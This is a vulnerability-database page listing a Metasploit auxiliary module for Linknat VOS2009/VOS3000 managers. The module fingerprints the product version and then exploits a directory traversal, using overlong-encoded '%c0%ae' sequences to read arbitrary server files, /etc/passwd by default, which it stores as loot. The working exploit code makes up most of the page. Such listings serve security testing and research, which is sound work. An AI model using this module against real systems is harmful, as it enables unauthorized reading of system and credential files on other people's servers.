Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linknat Vos Manager Traversal

🗓️ 01 Sep 2024 00:00:00Reported by Jay Turla, metasploit.comType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 162 Views

Linknat Vos Manager Traversal vulnerability test module for versions vos2009/vos3000

Code
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Auxiliary::Report  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Scanner  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Linknat Vos Manager Traversal',  
'Description' => %q(  
This module attempts to test whether a file traversal vulnerability  
is present in version of linknat vos2009/vos3000  
),  
'References' => [  
['URL', 'http://www.linknat.com/'],  
['URL', 'http://www.wooyun.org/bugs/wooyun-2010-0145458']  
],  
'Author' => ['Nixawk'],  
'License' => MSF_LICENSE))  
  
register_options(  
[  
Opt::RPORT(80),  
OptString.new('TARGETURI', [true, 'The path of Linknat Vos Manager (/chs/, /cht/, /eng/)', '/eng/']),  
OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),  
OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 5])  
])  
end  
  
def vos_uri(path)  
full_uri =~ %r{/$} ? "#{full_uri}#{path}" : "#{full_uri}/#{path}"  
end  
  
def vos_version  
case target_uri.to_s  
when /chs/i  
js_uri = vos_uri('js/lang_zh_cn.js')  
when /cht/i  
js_uri = vos_uri('js/lang_zh_tw.js')  
when /eng/i  
js_uri = vos_uri('js/lang_en_us.js')  
else  
print_warning("#{full_uri} - Please identify VOS version manually")  
return  
end  
  
res = send_request_cgi('uri' => js_uri)  
return unless res  
  
vprint_status("#{js_uri} - HTTP/#{res.proto} #{res.code} #{res.message}")  
  
return unless res.code == 200  
res.body =~ /s\[8\] = \"([^"]*)\"/m ? major = $1 : major = nil  
res.body =~ /s\[169\] = \"[^:]*: ([^"\\]*)\"/m ? minor = $1 : minor = nil  
"#{major} #{minor}"  
end  
  
def run_host(ip)  
version = vos_version  
unless version  
print_error("#{full_uri} - Failed to identify Linknat VOS")  
return  
end  
  
traversal = '/%c0%ae%c0%ae' * datastore['TRAVERSAL_DEPTH']  
filename = datastore['FILEPATH']  
  
uri = normalize_uri(target_uri.path, '..', traversal, filename)  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => uri  
)  
  
if res && res.code == 200  
path = store_loot(  
version,  
'text/plain',  
ip,  
res.body,  
filename)  
print_good("#{full_uri} - File saved in: #{path}")  
else  
print_error("#{full_uri} - Nothing was downloaded")  
end  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Sep 2024 00:00Current
7.4High risk
Vulners AI Score7.4
metasploitlinknat vos managertraversalvulnerabilityversionfile traversalhttpsecurity
162